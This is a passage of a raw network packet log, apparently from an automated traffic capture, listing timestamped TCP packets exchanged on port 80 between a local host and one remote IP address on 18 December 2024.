                                                                                                                                                                                          Dec 18, 2024 09:07:22.882498026 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.882507086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.883281946 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.883328915 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.883342028 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.883352995 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.883380890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.883399963 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.884133101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.884183884 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.884203911 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.884219885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.884246111 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.884265900 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885018110 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885063887 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885096073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885108948 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885135889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885148048 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885859013 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885901928 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885932922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885943890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.885981083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.886718035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.886763096 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.886806965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.886818886 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.886845112 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.886862040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048474073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048511028 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048521996 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048538923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048589945 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048790932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048831940 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048880100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048892975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048926115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.048954964 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.049669981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.049715042 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.049731970 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.049741983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.049777985 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.049810886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.050553083 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.050606966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.050640106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.050652981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.050683975 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.051446915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.051493883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.051497936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.051506042 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.051536083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.051572084 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.052279949 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.052320957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.052355051 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.052365065 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.052388906 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.052407980 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.053195000 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.053236961 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.053256035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.053267002 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.053291082 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.053322077 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054022074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054064989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054064989 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054076910 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054100990 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054131985 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054964066 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054974079 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.054980993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.055022955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.055712938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.055752039 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.055784941 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.055794954 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.055830002 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.056039095 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.056647062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.056668997 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.056679010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.056688070 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.056713104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.057495117 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.057548046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.057558060 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.057574987 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.057595968 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.058350086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.058387041 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.058404922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.058415890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.058440924 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.058460951 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.059190035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.059228897 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.059267998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.059281111 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.059304953 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.059328079 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.060091019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.060131073 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.060153961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.060163975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.060194016 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.060957909 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061003923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061034918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061044931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061069012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061105013 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061816931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061862946 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061909914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061919928 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.061960936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.062701941 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.062741995 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.062764883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.062774897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.062804937 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.063541889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.063591003 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.063637972 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.063647985 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.063679934 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.063707113 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.064421892 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.064461946 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.064497948 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.064507961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.064549923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.065280914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.065324068 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.065342903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.065352917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.065381050 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.065399885 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.066175938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.066219091 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.066251040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.066262007 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.066293001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.066313028 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.067095041 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.067136049 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.067147017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.067157984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.067193985 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.067956924 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.068000078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.068202019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.068240881 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.068259001 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.068269014 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.068300962 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.069109917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.069128990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.069144964 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.069150925 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.069170952 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.069191933 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.070142031 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.070180893 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.070214033 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.070224047 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.070251942 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.070274115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071255922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071299076 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071331978 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071341991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071366072 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071388006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071887970 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071928978 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071950912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071960926 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.071985006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.072006941 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.072540998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.072586060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.072623014 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.072637081 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.072654009 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.072689056 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.073414087 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.073451996 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.073470116 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.073479891 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.073513031 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.074264050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.074307919 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.074351072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.074362040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.074395895 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.075139999 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.075179100 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.075208902 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.075220108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.075259924 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076040983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076081991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076106071 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076116085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076152086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076881886 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076927900 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076958895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076970100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.076992035 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.077012062 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.077785015 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.077830076 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.077832937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.077842951 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.077877998 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.078596115 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.078644037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240427017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240453959 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240467072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240612984 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240612984 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240695000 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240751982 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240768909 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240780115 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240819931 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.240853071 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.241775990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.241786003 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.241796017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.241831064 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.241872072 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.242393970 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.242450953 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.242450953 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.242461920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.242496967 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.242522955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.243478060 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.243489027 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.243499994 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.243530989 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.243563890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.244187117 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.244240999 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.244249105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.244261980 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.244297028 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.244323015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245040894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245098114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245100021 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245110989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245151043 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245177031 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245889902 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245942116 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245945930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245956898 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.245990038 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.246851921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.246896029 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.246906042 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.246929884 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.246972084 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248013973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248069048 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248140097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248151064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248193979 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248487949 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248538971 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248642921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248656034 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248693943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.248734951 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.249334097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.249388933 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.249398947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.249411106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.249459028 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.250230074 CET804971431.41.244.11192.168.2.8
